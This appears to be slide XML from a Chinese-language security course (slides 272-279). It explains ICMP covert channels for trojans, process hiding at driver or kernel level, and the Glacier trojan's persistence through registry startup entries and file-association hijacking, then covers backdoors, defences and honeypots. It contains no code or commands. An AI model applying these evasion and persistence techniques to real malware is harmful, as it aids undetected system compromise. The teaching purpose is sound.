    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1812869297"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议进行通讯：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由内核或进程直接处理而不需要通过端口。瞒过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和端口扫描软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据）：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>报文，当出现特殊报文时（比如特殊大小的包、特殊的报文结构等），打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口等待控制端的连接 .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>真正意义上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严格使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议传递数据和控制命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来通讯</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>272</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1117257501"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程名字迷惑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>把木马写入到驱动和内核的级别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过拦截系统调用的服务，替代或嵌入系统功能（驱动程序或动态链接库）如，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将木马嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，系统运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows.exe，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实际上同时运行了木马和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows.exe。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马进程不容易发现，发现后没法或不允许删除</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974807773"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马具有很强潜伏能力：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表面上的木马被发现并删除以后，后备木马在一定的条件下会跳出来。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Glacier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（冰河）有两个服务器程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C:\Windows\System\Kernel32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，挂在注册表的启动组中,当电脑启动的时候,会装入内存,这是表面上的木马；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C:\Windows\System\Sysexplr.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，也在注册表中,它修改了文本文件的关联，当点击文本文件的时候，它就启动了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特洛伊木马潜伏性</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274</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2682128069"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>逻辑炸弹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其它恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0BCB65F0-6D47-4B70-B88E-62AB8ACA3AEA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>275</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指那些绕过安全性控制而获取对程序或系统访问权的程序方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门、木马联系与区别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>联系：均隐藏在用户系统中向外发送信息，而且本身具有一定权限，便于远程计算机对本机控制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>区别：木马相对独立、完整且功能强大；后门不独立存在，体积小，功能单一。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门</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276</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1992595869"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术手段：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>运行实时监控程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防火墙、防病毒软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全意识：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不要随意打开来历不明的邮件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不要随意下载来历不明的软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>及时修补漏洞和关闭可疑的端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尽量少用共享文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>经常升级系统和更新病毒库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马与后门的防范方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A57B97A-A9B9-4020-B3F9-01CE7FC071A4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>277</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一种安全资源，引诱黑客攻击，收集攻击相关信息或资源（恶意代码）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客动物园</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>学习型：分析、学习攻击心理、方式、手段、利用漏洞等，用于技术研究机构，防御产品企业等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用型：部署在应用系统周边，掌握网络或系统安全状态，消耗黑客资源、分担系统安全风险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜罐不提供实际服务，其价值在于被扫描、攻击和攻陷。所有流入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流出蜜罐的网络流量都是恶意流量，可能预示了扫描、攻击和攻陷。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜罐技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948"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D54C75E9-9CF2-4F4B-A286-F7E3C93AA484}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>278</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客动物园</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>吸引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱骗，有攻击才能发挥作用，才有价值，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>散布敏感信息、遗留安全漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>come on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>baby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>仿真流量，模拟用户活动，避免被黑客发现陷入蜜罐，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>baby don’t go</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>收集信息，嗅探、日志、日志存放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>困兽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制黑客行为，避免为所欲为，避免称为攻击跳板，控制外出连接，防火墙连接限制，连接重定向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜罐技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972"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FE81AAE-4FF3-4B31-B934-C7C0A1927417}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>279</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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4756" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3200400"/>
            <a:ext cx="6858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端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>判断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714757" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1600200"/>
            <a:ext cx="6858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判断</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714758" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
